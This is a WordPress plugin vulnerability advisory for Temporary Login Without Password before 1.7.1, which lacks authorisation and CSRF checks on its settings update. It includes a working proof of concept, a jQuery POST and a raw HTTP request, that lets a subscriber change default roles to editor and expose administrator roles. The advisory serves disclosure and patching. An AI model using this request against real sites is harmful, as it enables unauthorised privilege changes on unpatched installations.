WordPress Plugin Vulnerabilities
Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update
Description
The plugin does not have authorisation and CSRF checks when updating its settings, which could allows any logged-in users, such as subscribers to update them
Proof of Concept
jQuery.post("https://example.com/wp-admin/index.php", {
"wtlwp-nonce": "foo", // Not validated
tlwp_settings_data: {
default_role: "editor",
default_expiry_time: "month_after_access",
visible_roles: ["editor", "administrator"],
default_redirect_to: "wp_dashboard"
}
})
POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]
wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard Affects Plugins
Fixed in version 1.7.1
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-11-15 (about 8 months ago)
Added
2021-11-15 (about 8 months ago)
Last Updated
2022-04-09 (about 4 months ago)